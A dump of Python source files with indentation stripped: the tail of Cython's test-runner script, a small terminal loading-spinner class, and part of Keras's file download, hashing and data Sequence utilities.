help="do not delete the generated shared library files (allows manual module experimentation)")
parser.add_option("--no-cleanup-failures", dest="cleanup_failures",
action="store_false", default=True,
help="enable --no-cleanup and --no-cleanup-sharedlibs for failed tests only")
parser.add_option("--no-cython", dest="with_cython",
action="store_false", default=True,
help="do not run the Cython compiler, only the C compiler")
parser.add_option("--compiler", dest="compiler", default=None,
help="C compiler type")
backend_list = ','.join(BACKENDS)
parser.add_option("--backends", dest="backends", default=backend_list,
help="select backends to test (default: %s)" % backend_list)
parser.add_option("--no-c", dest="use_c",
action="store_false", default=True,
help="do not test C compilation backend")
parser.add_option("--no-cpp", dest="use_cpp",
action="store_false", default=True,
help="do not test C++ compilation backend")
parser.add_option("--no-unit", dest="unittests",
action="store_false", default=True,
help="do not run the unit tests")
parser.add_option("--no-doctest", dest="doctests",
action="store_false", default=True,
help="do not run the doctests")
parser.add_option("--no-file", dest="filetests",
action="store_false", default=True,
help="do not run the file based tests")
parser.add_option("--no-pyregr", dest="pyregr",
action="store_false", default=True,
help="do not run the regression tests of CPython in tests/pyregr/")
parser.add_option("--no-examples", dest="examples",
action="store_false", default=True,
help="Do not run the documentation tests in the examples directory.")
parser.add_option("--no-code-style", dest="code_style",
action="store_false", default=True,
help="Do not run the code style (PEP8) checks.")
parser.add_option("--cython-only", dest="cython_only",
action="store_true", default=False,
help="only compile pyx to c, do not run C compiler or run the tests")
parser.add_option("--no-refnanny", dest="with_refnanny",
action="store_false", default=True,
help="do not regression test reference counting")
parser.add_option("--no-fork", dest="fork",
action="store_false", default=True,
help="do not fork to run tests")
parser.add_option("--sys-pyregr", dest="system_pyregr",
action="store_true", default=False,
help="run the regression tests of the CPython installation")
parser.add_option("-x", "--exclude", dest="exclude",
action="append", metavar="PATTERN",
help="exclude tests matching the PATTERN")
parser.add_option("-j", "--shard_count", dest="shard_count", metavar="N",
type=int, default=1,
help="shard this run into several parallel runs")
parser.add_option("--shard_num", dest="shard_num", metavar="K",
type=int, default=-1,
help="test only this single shard")
parser.add_option("--profile", dest="profile",
action="store_true", default=False,
help="enable profiling of the tests")
parser.add_option("-C", "--coverage", dest="coverage",
action="store_true", default=False,
help="collect source coverage data for the Compiler")
parser.add_option("--coverage-xml", dest="coverage_xml",
action="store_true", default=False,
help="collect source coverage data for the Compiler in XML format")
parser.add_option("--coverage-html", dest="coverage_html",
action="store_true", default=False,
help="collect source coverage data for the Compiler in HTML format")
parser.add_option("-A", "--annotate", dest="annotate_source",
action="store_true", default=True,
help="generate annotated HTML versions of the test source files")
parser.add_option("--no-annotate", dest="annotate_source",
action="store_false",
help="do not generate annotated HTML versions of the test source files")
parser.add_option("-v", "--verbose", dest="verbosity",
action="count", default=0,
help="display test progress, pass twice to print test names")
parser.add_option("-T", "--ticket", dest="tickets",
action="append",
help="a bug ticket number to run the respective test in 'tests/*'")
parser.add_option("-3", dest="language_level",
action="store_const", const=3, default=2,
help="set language level to Python 3 (useful for running the CPython regression tests)'")
parser.add_option("--xml-output", dest="xml_output_dir", metavar="DIR",
help="write test results in XML to directory DIR")
parser.add_option("--exit-ok", dest="exit_ok", default=False,
action="store_true",
help="exit without error code even on test failures")
parser.add_option("--failfast", dest="failfast", default=False,
action="store_true",
help="stop on first failure or error")
parser.add_option("--root-dir", dest="root_dir", default=os.path.join(DISTDIR, 'tests'),
help=("Directory to look for the file based "
"tests (the ones which are deactivated with '--no-file'."))
parser.add_option("--examples-dir", dest="examples_dir",
default=os.path.join(DISTDIR, 'docs', 'examples'),
help="Directory to look for documentation example tests")
parser.add_option("--work-dir", dest="work_dir", default=os.path.join(os.getcwd(), 'TEST_TMP'),
help="working directory")
parser.add_option("--cython-dir", dest="cython_dir", default=os.getcwd(),
help="Cython installation directory (default: use local source version)")
parser.add_option("--debug", dest="for_debugging", default=False, action="store_true",
help="configure for easier use with a debugger (e.g. gdb)")
parser.add_option("--pyximport-py", dest="pyximport_py", default=False, action="store_true",
help="use pyximport to automatically compile imported .pyx and .py files")
parser.add_option("--watermark", dest="watermark", default=None,
help="deterministic generated by string")
parser.add_option("--use_common_utility_dir", default=False, action="store_true")
parser.add_option("--use_formal_grammar", default=False, action="store_true")
parser.add_option("--test_determinism", default=False, action="store_true",
help="test whether Cython's output is deterministic")
parser.add_option("--pythran-dir", dest="pythran_dir", default=None,
help="specify Pythran include directory. This will run the C++ tests using Pythran backend for Numpy")
options, cmd_args = parser.parse_args(args)
if options.with_cython and sys.version_info[0] >= 3:
sys.path.insert(0, options.cython_dir)
    # the code style check needs glob's recursive '**' wildcard (Python 3.5+).
if sys.version_info < (3, 5) or cmd_args:
options.code_style = False
WITH_CYTHON = options.with_cython
coverage = None
if options.coverage or options.coverage_xml or options.coverage_html:
if not WITH_CYTHON:
options.coverage = options.coverage_xml = options.coverage_html = False
elif options.shard_num == -1:
print("Enabling coverage analysis")
from coverage import coverage as _coverage
coverage = _coverage(branch=True)
coverage.erase()
coverage.start()
if options.xml_output_dir:
shutil.rmtree(options.xml_output_dir, ignore_errors=True)
if options.shard_count > 1 and options.shard_num == -1:
import multiprocessing
pool = multiprocessing.Pool(options.shard_count)
tasks = [(options, cmd_args, shard_num) for shard_num in range(options.shard_count)]
errors = []
# NOTE: create process pool before time stamper thread to avoid forking issues.
total_time = time.time()
stats = Stats()
with time_stamper_thread():
for shard_num, shard_stats, return_code in pool.imap_unordered(runtests_callback, tasks):
if return_code != 0:
errors.append(shard_num)
sys.stderr.write("FAILED (%s/%s)\n" % (shard_num, options.shard_count))
sys.stderr.write("ALL DONE (%s/%s)\n" % (shard_num, options.shard_count))
stats.update(shard_stats)
pool.close()
pool.join()
total_time = time.time() - total_time
sys.stderr.write("Sharded tests run in %d seconds (%.1f minutes)\n" % (round(total_time), total_time / 60.))
if errors:
sys.stderr.write("Errors for shards %s\n" % ", ".join([str(e) for e in errors]))
return_code = 1
else:
return_code = 0
else:
with time_stamper_thread():
_, stats, return_code = runtests(options, cmd_args, coverage)
if coverage:
if options.shard_count > 1 and options.shard_num == -1:
coverage.combine()
coverage.stop()
stats.print_stats(sys.stderr)
if coverage:
save_coverage(coverage, options)
sys.stderr.write("ALL DONE\n")
sys.stderr.flush()
try:
check_thread_termination(ignore_seen=False)
except PendingThreadsError:
# normal program exit won't kill the threads, do it the hard way here
flush_and_terminate(return_code)
else:
sys.exit(return_code)
@contextmanager
def time_stamper_thread(interval=10):
"""
Print regular time stamps into the build logs to find slow tests.
@param interval: time interval in seconds
"""
try:
_xrange = xrange
except NameError:
_xrange = range
import threading
from datetime import datetime
from time import sleep
interval = _xrange(interval * 4)
now = datetime.now
write = sys.__stderr__.write
stop = False
def time_stamper():
while True:
for _ in interval:
if stop:
return
sleep(1./4)
write('\n#### %s\n' % now())
thread = threading.Thread(target=time_stamper, name='time_stamper')
thread.setDaemon(True) # Py2.6 ...
thread.start()
try:
yield
finally:
stop = True
thread.join()
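# Hypothetical usage sketch: wrap any long-running phase so a time stamp keeps
# appearing on stderr while it runs, e.g.
#
#     with time_stamper_thread(interval=5):
#         test_runner.run(test_suite)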
def configure_cython(options):
global CompilationOptions, pyrex_default_options, cython_compile
from Cython.Compiler.Main import \
CompilationOptions, \
default_options as pyrex_default_options
from Cython.Compiler.Options import _directive_defaults as directive_defaults
from Cython.Compiler import Errors
Errors.LEVEL = 0 # show all warnings
from Cython.Compiler import Options
Options.generate_cleanup_code = 3 # complete cleanup code
from Cython.Compiler import DebugFlags
DebugFlags.debug_temp_code_comments = 1
pyrex_default_options['formal_grammar'] = options.use_formal_grammar
if options.profile:
directive_defaults['profile'] = True
if options.watermark:
import Cython.Compiler.Version
Cython.Compiler.Version.watermark = options.watermark
def save_coverage(coverage, options):
if options.coverage:
coverage.report(show_missing=0)
if options.coverage_xml:
coverage.xml_report(outfile="coverage-report.xml")
if options.coverage_html:
coverage.html_report(directory="coverage-report-html")
def runtests_callback(args):
options, cmd_args, shard_num = args
options.shard_num = shard_num
return runtests(options, cmd_args)
def runtests(options, cmd_args, coverage=None):
WITH_CYTHON = options.with_cython
ROOTDIR = os.path.abspath(options.root_dir)
WORKDIR = os.path.abspath(options.work_dir)
if WITH_CYTHON:
configure_cython(options)
xml_output_dir = options.xml_output_dir
if options.shard_num > -1:
WORKDIR = os.path.join(WORKDIR, str(options.shard_num))
if xml_output_dir:
xml_output_dir = os.path.join(xml_output_dir, 'shard-%03d' % options.shard_num)
# RUN ALL TESTS!
UNITTEST_MODULE = "Cython"
UNITTEST_ROOT = os.path.join(os.path.dirname(__file__), UNITTEST_MODULE)
if WITH_CYTHON:
if os.path.exists(WORKDIR):
for path in os.listdir(WORKDIR):
if path in ("support", "Cy3"): continue
shutil.rmtree(os.path.join(WORKDIR, path), ignore_errors=True)
if not os.path.exists(WORKDIR):
os.makedirs(WORKDIR)
if options.shard_num <= 0:
sys.stderr.write("Python %s\n" % sys.version)
sys.stderr.write("\n")
if WITH_CYTHON:
sys.stderr.write("Running tests against Cython %s\n" % get_version())
else:
sys.stderr.write("Running tests without Cython.\n")
if options.for_debugging:
options.cleanup_workdir = False
options.cleanup_sharedlibs = False
options.fork = False
if WITH_CYTHON and include_debugger:
from Cython.Compiler.Main import default_options as compiler_default_options
compiler_default_options['gdb_debug'] = True
compiler_default_options['output_dir'] = os.getcwd()
if IS_PYPY:
if options.with_refnanny:
sys.stderr.write("Disabling refnanny in PyPy\n")
options.with_refnanny = False
if options.with_refnanny:
from pyximport.pyxbuild import pyx_to_dll
libpath = pyx_to_dll(os.path.join("Cython", "Runtime", "refnanny.pyx"),
build_in_temp=True,
pyxbuild_dir=os.path.join(WORKDIR, "support"))
sys.path.insert(0, os.path.split(libpath)[0])
CFLAGS.append("-DCYTHON_REFNANNY=1")
if xml_output_dir and options.fork:
        # forked testing and XML output don't currently work together
sys.stderr.write("Disabling forked testing to support XML test output\n")
options.fork = False
if WITH_CYTHON:
sys.stderr.write("Using Cython language level %d.\n" % options.language_level)
test_bugs = False
if options.tickets:
for ticket_number in options.tickets:
test_bugs = True
cmd_args.append('ticket:%s' % ticket_number)
if not test_bugs:
for selector in cmd_args:
if selector.startswith('bugs'):
test_bugs = True
selectors = [ string_selector(r) for r in cmd_args ]
verbose_excludes = selectors or options.verbosity >= 2
if not selectors:
selectors = [ lambda x, tags=None: True ]
# Check which external modules are not present and exclude tests
# which depends on them (by prefix)
missing_dep_excluder = MissingDependencyExcluder(EXT_DEP_MODULES)
version_dep_excluder = VersionDependencyExcluder(VER_DEP_MODULES)
exclude_selectors = [missing_dep_excluder, version_dep_excluder] # want to print msg at exit
try:
import IPython.core.release
if list(IPython.core.release._ver) < [1, 0, 0]:
raise ImportError
except (ImportError, AttributeError, TypeError):
exclude_selectors.append(RegExSelector('IPython'))
try:
raise ImportError("Jedi typer is currently broken, see GH#1845")
import jedi
if not ([0, 9] <= list(map(int, re.findall('[0-9]+', jedi.__version__ or '0')))):
raise ImportError
except (ImportError, AttributeError, TypeError):
exclude_selectors.append(RegExSelector('Jedi'))
if options.exclude:
exclude_selectors += [ string_selector(r) for r in options.exclude ]
if not COMPILER_HAS_INT128 or not IS_CPYTHON:
exclude_selectors += [RegExSelector('int128')]
if options.shard_num > -1:
exclude_selectors.append(ShardExcludeSelector(options.shard_num, options.shard_count))
if not test_bugs:
bug_files = [
('bugs.txt', True),
('pypy_bugs.txt', IS_PYPY),
('windows_bugs.txt', sys.platform == 'win32'),
('cygwin_bugs.txt', sys.platform == 'cygwin')
]
exclude_selectors += [
FileListExcluder(os.path.join(ROOTDIR, bugs_file_name),
verbose=verbose_excludes)
for bugs_file_name, condition in bug_files if condition
]
global COMPILER
if options.compiler:
COMPILER = options.compiler
selected_backends = [ name.strip() for name in options.backends.split(',') if name.strip() ]
backends = []
for backend in selected_backends:
if backend == 'c' and not options.use_c:
continue
elif backend == 'cpp' and not options.use_cpp:
continue
elif backend not in BACKENDS:
sys.stderr.write("Unknown backend requested: '%s' not one of [%s]\n" % (
backend, ','.join(BACKENDS)))
sys.exit(1)
backends.append(backend)
if options.shard_num <= 0:
sys.stderr.write("Backends: %s\n" % ','.join(backends))
languages = backends
if 'TRAVIS' in os.environ and sys.platform == 'darwin' and 'cpp' in languages:
bugs_file_name = 'travis_macos_cpp_bugs.txt'
exclude_selectors += [
FileListExcluder(os.path.join(ROOTDIR, bugs_file_name),
verbose=verbose_excludes)
]
if options.use_common_utility_dir:
common_utility_dir = os.path.join(WORKDIR, 'utility_code')
if not os.path.exists(common_utility_dir):
os.makedirs(common_utility_dir)
else:
common_utility_dir = None
sys.stderr.write("\n")
test_suite = unittest.TestSuite()
stats = Stats()
if options.unittests:
collect_unittests(UNITTEST_ROOT, UNITTEST_MODULE + ".", test_suite, selectors, exclude_selectors)
if options.doctests:
collect_doctests(UNITTEST_ROOT, UNITTEST_MODULE + ".", test_suite, selectors, exclude_selectors)
if options.filetests and languages:
filetests = TestBuilder(ROOTDIR, WORKDIR, selectors, exclude_selectors,
options, options.pyregr, languages, test_bugs,
options.language_level, common_utility_dir,
options.pythran_dir, add_embedded_test=True, stats=stats)
test_suite.addTest(filetests.build_suite())
if options.examples and languages:
for subdirectory in glob.glob(os.path.join(options.examples_dir, "*/")):
filetests = TestBuilder(subdirectory, WORKDIR, selectors, exclude_selectors,
options, options.pyregr, languages, test_bugs,
options.language_level, common_utility_dir,
options.pythran_dir,
default_mode='compile', stats=stats)
test_suite.addTest(filetests.build_suite())
if options.system_pyregr and languages:
sys_pyregr_dir = os.path.join(sys.prefix, 'lib', 'python'+sys.version[:3], 'test')
if not os.path.isdir(sys_pyregr_dir):
sys_pyregr_dir = os.path.join(os.path.dirname(sys.executable), 'Lib', 'test') # source build
if os.path.isdir(sys_pyregr_dir):
filetests = TestBuilder(ROOTDIR, WORKDIR, selectors, exclude_selectors,
options, True, languages, test_bugs,
sys.version_info[0], common_utility_dir, stats=stats)
sys.stderr.write("Including CPython regression tests in %s\n" % sys_pyregr_dir)
test_suite.addTest(filetests.handle_directory(sys_pyregr_dir, 'pyregr'))
if options.code_style and options.shard_num <= 0:
test_suite.addTest(TestCodeFormat(options.cython_dir))
if xml_output_dir:
from Cython.Tests.xmlrunner import XMLTestRunner
if not os.path.exists(xml_output_dir):
try:
os.makedirs(xml_output_dir)
except OSError:
pass # concurrency issue?
test_runner = XMLTestRunner(output=xml_output_dir,
verbose=options.verbosity > 0)
if options.failfast:
sys.stderr.write("--failfast not supported with XML runner\n")
else:
text_runner_options = {}
if options.failfast:
if sys.version_info < (2, 7):
sys.stderr.write("--failfast not supported with Python < 2.7\n")
else:
text_runner_options['failfast'] = True
test_runner = unittest.TextTestRunner(verbosity=options.verbosity, **text_runner_options)
if options.pyximport_py:
from pyximport import pyximport
pyximport.install(pyimport=True, build_dir=os.path.join(WORKDIR, '_pyximport'),
load_py_module_on_import_failure=True, inplace=True)
try:
gc.set_debug(gc.DEBUG_UNCOLLECTABLE)
except AttributeError:
pass # not available on PyPy
result = test_runner.run(test_suite)
if common_utility_dir and options.shard_num < 0 and options.cleanup_workdir:
shutil.rmtree(common_utility_dir)
if missing_dep_excluder.tests_missing_deps:
sys.stderr.write("Following tests excluded because of missing dependencies on your system:\n")
for test in missing_dep_excluder.tests_missing_deps:
sys.stderr.write(" %s\n" % test)
if options.with_refnanny:
import refnanny
sys.stderr.write("\n".join([repr(x) for x in refnanny.reflog]))
if options.exit_ok:
return options.shard_num, stats, 0
else:
return options.shard_num, stats, not result.wasSuccessful()
if __name__ == '__main__':
try:
main()
except Exception:
traceback.print_exc()
try:
check_thread_termination(ignore_seen=False)
except PendingThreadsError:
# normal program exit won't kill the threads, do it the hard way here
flush_and_terminate(1)
sys.exit(1)
|
loader.py
|
from itertools import cycle
from shutil import get_terminal_size
from threading import Thread
from time import sleep
class Loader:
def __init__(self, desc="Loading...", end="Done!", timeout=0.1):
"""
A loader-like context manager
Args:
desc (str, optional): The loader's description. Defaults to "Loading...".
end (str, optional): Final print. Defaults to "Done!".
timeout (float, optional): Sleep time between prints. Defaults to 0.1.
"""
self.desc = desc
self.end = end
self.timeout = timeout
self._thread = Thread(target=self._animate, daemon=True)
self.steps = ["⢿", "⣻", "⣽", "⣾", "⣷", "⣯", "⣟", "⡿"]
self.done = False
def start(self):
self._thread.start()
return self
def _animate(self):
for c in cycle(self.steps):
if self.done:
break
print(f"\r{self.desc} {c} ", flush=True, end="")
sleep(self.timeout)
def __enter__(self):
self.start()
def stop(self):
self.done = True
cols = get_terminal_size((80, 20)).columns
print("\r" + " " * cols, end="", flush=True)
print(f"\r{self.end}", flush=True)
def __exit__(self, exc_type, exc_value, tb):
# handle exceptions with those variables ^
self.stop()
if __name__ == "__main__":
with Loader("Loading with context manager..."):
for i in range(10):
sleep(0.25)
loader = Loader("Loading with object...", "That was fast!", 0.05).start()
for i in range(10):
sleep(0.25)
loader.stop()
|
data_utils.py
|
# Lint as python3
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# pylint: disable=g-import-not-at-top
"""Utilities for file download and caching."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow.compat.v2 as tf
from abc import abstractmethod
from contextlib import closing
import errno
import functools
import hashlib
import multiprocessing.dummy
import os
import random
import shutil
import sys
import tarfile
import threading
import time
import weakref
import zipfile
import numpy as np
import six
from six.moves.urllib.error import HTTPError
from six.moves.urllib.error import URLError
from six.moves.urllib.request import urlopen
from keras.utils import tf_inspect
from keras.utils.generic_utils import Progbar
from keras.utils.io_utils import path_to_string
from tensorflow.python.util.tf_export import keras_export
try:
import queue
except ImportError:
import Queue as queue
try:
import typing
is_iterator = lambda x: isinstance(x, typing.Iterator)
except ImportError:
  # Python 2 iterators expose next(); Python 3 should have typing, so checking __next__ is not needed.
is_iterator = lambda x: hasattr(x, '__iter__') and hasattr(x, 'next')
if True: # This gets transformed to `if sys.version_info[0] == 2:` in OSS. # pylint: disable=using-constant-test
def urlretrieve(url, filename, reporthook=None, data=None):
"""Replacement for `urlretrieve` for Python 2.
Under Python 2, `urlretrieve` relies on `FancyURLopener` from legacy
`urllib` module, known to have issues with proxy management.
Args:
url: url to retrieve.
filename: where to store the retrieved data locally.
reporthook: a hook function that will be called once on establishment of
the network connection and once after each block read thereafter. The
hook will be passed three arguments; a count of blocks transferred so
far, a block size in bytes, and the total size of the file.
data: `data` argument passed to `urlopen`.
"""
def chunk_read(response, chunk_size=8192, reporthook=None):
content_type = response.info().get('Content-Length')
total_size = -1
if content_type is not None:
total_size = int(content_type.strip())
count = 0
while True:
chunk = response.read(chunk_size)
count += 1
if reporthook is not None:
reporthook(count, chunk_size, total_size)
if chunk:
yield chunk
else:
break
response = urlopen(url, data)
with open(filename, 'wb') as fd:
for chunk in chunk_read(response, reporthook=reporthook):
fd.write(chunk)
else:
from six.moves.urllib.request import urlretrieve
def is_generator_or_sequence(x):
"""Check if `x` is a Keras generator type."""
builtin_iterators = (str, list, tuple, dict, set, frozenset)
if isinstance(x, (tf.Tensor, np.ndarray) + builtin_iterators):
return False
return tf_inspect.isgenerator(x) or isinstance(x, Sequence) or is_iterator(x)
def _extract_archive(file_path, path='.', archive_format='auto'):
"""Extracts an archive if it matches tar, tar.gz, tar.bz, or zip formats.
Args:
file_path: path to the archive file
path: path to extract the archive file
archive_format: Archive format to try for extracting the file.
Options are 'auto', 'tar', 'zip', and None.
'tar' includes tar, tar.gz, and tar.bz files.
The default 'auto' is ['tar', 'zip'].
None or an empty list will return no matches found.
Returns:
True if a match was found and an archive extraction was completed,
False otherwise.
"""
if archive_format is None:
return False
if archive_format == 'auto':
archive_format = ['tar', 'zip']
if isinstance(archive_format, six.string_types):
archive_format = [archive_format]
file_path = path_to_string(file_path)
path = path_to_string(path)
for archive_type in archive_format:
if archive_type == 'tar':
open_fn = tarfile.open
is_match_fn = tarfile.is_tarfile
if archive_type == 'zip':
open_fn = zipfile.ZipFile
is_match_fn = zipfile.is_zipfile
if is_match_fn(file_path):
with open_fn(file_path) as archive:
try:
archive.extractall(path)
except (tarfile.TarError, RuntimeError, KeyboardInterrupt):
if os.path.exists(path):
if os.path.isfile(path):
os.remove(path)
else:
shutil.rmtree(path)
raise
return True
return False
@keras_export('keras.utils.get_file')
def get_file(fname,
origin,
untar=False,
md5_hash=None,
file_hash=None,
cache_subdir='datasets',
hash_algorithm='auto',
extract=False,
archive_format='auto',
cache_dir=None):
"""Downloads a file from a URL if it not already in the cache.
By default the file at the url `origin` is downloaded to the
cache_dir `~/.keras`, placed in the cache_subdir `datasets`,
and given the filename `fname`. The final location of a file
`example.txt` would therefore be `~/.keras/datasets/example.txt`.
Files in tar, tar.gz, tar.bz, and zip formats can also be extracted.
Passing a hash will verify the file after download. The command line
programs `shasum` and `sha256sum` can compute the hash.
Example:
```python
path_to_downloaded_file = tf.keras.utils.get_file(
"flower_photos",
"https://storage.googleapis.com/download.tensorflow.org/example_images/flower_photos.tgz",
untar=True)
```
Args:
fname: Name of the file. If an absolute path `/path/to/file.txt` is
specified the file will be saved at that location.
origin: Original URL of the file.
untar: Deprecated in favor of `extract` argument.
boolean, whether the file should be decompressed
md5_hash: Deprecated in favor of `file_hash` argument.
md5 hash of the file for verification
file_hash: The expected hash string of the file after download.
The sha256 and md5 hash algorithms are both supported.
cache_subdir: Subdirectory under the Keras cache dir where the file is
saved. If an absolute path `/path/to/folder` is
specified the file will be saved at that location.
hash_algorithm: Select the hash algorithm to verify the file.
options are `'md5'`, `'sha256'`, and `'auto'`.
The default 'auto' detects the hash algorithm in use.
extract: True tries extracting the file as an Archive, like tar or zip.
archive_format: Archive format to try for extracting the file.
Options are `'auto'`, `'tar'`, `'zip'`, and `None`.
`'tar'` includes tar, tar.gz, and tar.bz files.
The default `'auto'` corresponds to `['tar', 'zip']`.
None or an empty list will return no matches found.
cache_dir: Location to store cached files, when None it
defaults to the default directory `~/.keras/`.
Returns:
Path to the downloaded file
"""
if cache_dir is None:
cache_dir = os.path.join(os.path.expanduser('~'), '.keras')
if md5_hash is not None and file_hash is None:
file_hash = md5_hash
hash_algorithm = 'md5'
datadir_base = os.path.expanduser(cache_dir)
if not os.access(datadir_base, os.W_OK):
datadir_base = os.path.join('/tmp', '.keras')
datadir = os.path.join(datadir_base, cache_subdir)
_makedirs_exist_ok(datadir)
fname = path_to_string(fname)
if untar:
untar_fpath = os.path.join(datadir, fname)
fpath = untar_fpath + '.tar.gz'
else:
fpath = os.path.join(datadir, fname)
download = False
if os.path.exists(fpath):
# File found; verify integrity if a hash was provided.
if file_hash is not None:
if not validate_file(fpath, file_hash, algorithm=hash_algorithm):
print('A local file was found, but it seems to be '
'incomplete or outdated because the ' + hash_algorithm +
' file hash does not match the original value of ' + file_hash +
' so we will re-download the data.')
download = True
else:
download = True
if download:
print('Downloading data from', origin)
class ProgressTracker(object):
# Maintain progbar for the lifetime of download.
# This design was chosen for Python 2.7 compatibility.
progbar = None
def dl_progress(count, block_size, total_size):
if ProgressTracker.progbar is None:
if total_size == -1:
total_size = None
ProgressTracker.progbar = Progbar(total_size)
else:
ProgressTracker.progbar.update(count * block_size)
error_msg = 'URL fetch failure on {}: {} -- {}'
try:
try:
urlretrieve(origin, fpath, dl_progress)
except HTTPError as e:
raise Exception(error_msg.format(origin, e.code, e.msg))
except URLError as e:
raise Exception(error_msg.format(origin, e.errno, e.reason))
except (Exception, KeyboardInterrupt) as e:
if os.path.exists(fpath):
os.remove(fpath)
raise
ProgressTracker.progbar = None
if untar:
if not os.path.exists(untar_fpath):
_extract_archive(fpath, datadir, archive_format='tar')
return untar_fpath
if extract:
_extract_archive(fpath, datadir, archive_format)
return fpath
def _makedirs_exist_ok(datadir):
if six.PY2:
# Python 2 doesn't have the exist_ok arg, so we try-except here.
try:
os.makedirs(datadir)
except OSError as e:
if e.errno != errno.EEXIST:
raise
else:
os.makedirs(datadir, exist_ok=True) # pylint: disable=unexpected-keyword-arg
def _hash_file(fpath, algorithm='sha256', chunk_size=65535):
"""Calculates a file sha256 or md5 hash.
Example:
```python
_hash_file('/path/to/file.zip')
'e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855'
```
Args:
fpath: path to the file being validated
algorithm: hash algorithm, one of `'auto'`, `'sha256'`, or `'md5'`.
The default `'auto'` detects the hash algorithm in use.
chunk_size: Bytes to read at a time, important for large files.
Returns:
The file hash
"""
  # Without an expected hash string to inspect, 'auto' falls back to sha256 here.
  if (algorithm == 'sha256') or (algorithm == 'auto'):
    hasher = hashlib.sha256()
else:
hasher = hashlib.md5()
with open(fpath, 'rb') as fpath_file:
for chunk in iter(lambda: fpath_file.read(chunk_size), b''):
hasher.update(chunk)
return hasher.hexdigest()
def validate_file(fpath, file_hash, algorithm='auto', chunk_size=65535):
"""Validates a file against a sha256 or md5 hash.
Args:
fpath: path to the file being validated
file_hash: The expected hash string of the file.
The sha256 and md5 hash algorithms are both supported.
algorithm: Hash algorithm, one of 'auto', 'sha256', or 'md5'.
The default 'auto' detects the hash algorithm in use.
chunk_size: Bytes to read at a time, important for large files.
Returns:
Whether the file is valid
"""
if (algorithm == 'sha256') or (algorithm == 'auto' and len(file_hash) == 64):
hasher = 'sha256'
else:
hasher = 'md5'
if str(_hash_file(fpath, hasher, chunk_size)) == str(file_hash):
return True
else:
return False
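# Illustrative sketch (not part of the original module): checking a previously
# downloaded file against an expected sha256 digest with `validate_file`. The
# path and digest below are hypothetical placeholders.
def _example_validate_download(fpath='/tmp/example.zip',
                               expected_sha256='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855'):
  if not os.path.exists(fpath):
    return False  # nothing to validate yet
  # 64 hex characters, so algorithm='auto' resolves to sha256 inside validate_file.
  return validate_file(fpath, expected_sha256, algorithm='auto')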
class ThreadsafeIter(object):
"""Wrap an iterator with a lock and propagate exceptions to all threads."""
def __init__(self, it):
self.it = it
self.lock = threading.Lock()
# After a generator throws an exception all subsequent next() calls raise a
# StopIteration Exception. This, however, presents an issue when mixing
# generators and threading because it means the order of retrieval need not
# match the order in which the generator was called. This can make it appear
# that a generator exited normally when in fact the terminating exception is
# just in a different thread. In order to provide thread safety, once
# self.it has thrown an exception we continue to throw the same exception.
self._exception = None
def __iter__(self):
return self
def next(self):
return self.__next__()
def __next__(self):
with self.lock:
if self._exception:
raise self._exception # pylint: disable=raising-bad-type
try:
return next(self.it)
except Exception as e:
self._exception = e
raise
def threadsafe_generator(f):
@functools.wraps(f)
def g(*a, **kw):
return ThreadsafeIter(f(*a, **kw))
return g
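# Illustrative sketch (not part of the original module): wrapping a plain
# generator with `threadsafe_generator` so several threads can consume it
# without interleaving calls into the underlying generator. `_example_counter`
# is a hypothetical name used only for this sketch.
@threadsafe_generator
def _example_counter(n):
  for i in range(n):
    yield i
# A call like `_example_counter(10)` now returns a `ThreadsafeIter`; its
# `__next__` is guarded by a lock and re-raises the first exception it saw.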
@keras_export('keras.utils.Sequence')
class Sequence(object):
"""Base object for fitting to a sequence of data, such as a dataset.
Every `Sequence` must implement the `__getitem__` and the `__len__` methods.
If you want to modify your dataset between epochs you may implement
`on_epoch_end`.
The method `__getitem__` should return a complete batch.
Notes:
  `Sequence` is a safer way to do multiprocessing. This structure guarantees
  that the network will only train once on each sample per epoch, which is not
  the case with generators.
Examples:
```python
from skimage.io import imread
from skimage.transform import resize
import numpy as np
import math
# Here, `x_set` is list of path to the images
# and `y_set` are the associated classes.
class CIFAR10Sequence(Sequence):
def __init__(self, x_set, y_set, batch_size):
self.x, self.y = x_set, y_set
self.batch_size = batch_size
def __len__(self):
return math.ceil(len(self.x) / self.batch_size)
def __getitem__(self, idx):
batch_x = self.x[idx * self.batch_size:(idx + 1) *
self.batch_size]
batch_y = self.y[idx * self.batch_size:(idx + 1) *
self.batch_size]
return np.array([
resize(imread(file_name), (200, 200))
for file_name in batch_x]), np.array(batch_y)
```
"""
@abstractmethod
def __getitem__(self, index):
"""Gets batch at position `index`.
Args:
index: position of the batch in the Sequence.
Returns:
A batch
"""
raise NotImplementedError
@abstractmethod
def __len__(self):
"""Number of batch in the Sequence.
Returns:
The number of batches in the Sequence.
"""
raise NotImplementedError
def on_epoch_end(self):
"""Method called at the end of every epoch.
"""
pass
def __iter__(self):
"""Create a generator that iterate over the Sequence."""
for item in (self[i] for i in range(len(self))):
yield item
def iter_sequence_infinite(seq):
"""Iterates indefinitely over a Sequence.
Args:
seq: `Sequence` instance.
Yields:
Batches of data from the `Sequence`.
"""
while True:
for item in seq:
yield item
# Global variables to be shared across processes
_SHARED_SEQUENCES = {}
# We use a Value to provide unique id to different processes.
_SEQUENCE_COUNTER = None
# Because multiprocessing pools are inherently unsafe, starting from a clean
# state can be essential to avoiding deadlocks. In order to accomplish this, we
# need to be able to check on the status of Pools that we create.
_DATA_POOLS = weakref.WeakSet()
_WORKER_ID_QUEUE = None # Only created if needed.
_WORKER_IDS = set()
_FORCE_THREADPOOL = False
_FORCE_THREADPOOL_LOCK = threading.RLock()
def dont_use_multiprocessing_pool(f):
@functools.wraps(f)
def wrapped(*args, **kwargs):
with _FORCE_THREADPOOL_LOCK:
global _FORCE_THREADPOOL
old_force_threadpool, _FORCE_THREADPOOL = _FORCE_THREADPOOL, True
out = f(*args, **kwargs)
_FORCE_THREADPOOL = old_force_threadpool
return out
return wrapped
def get_pool_class(use_multiprocessing):
global _FORCE_THREADPOOL
if not use_multiprocessing or _FORCE_THREADPOOL:
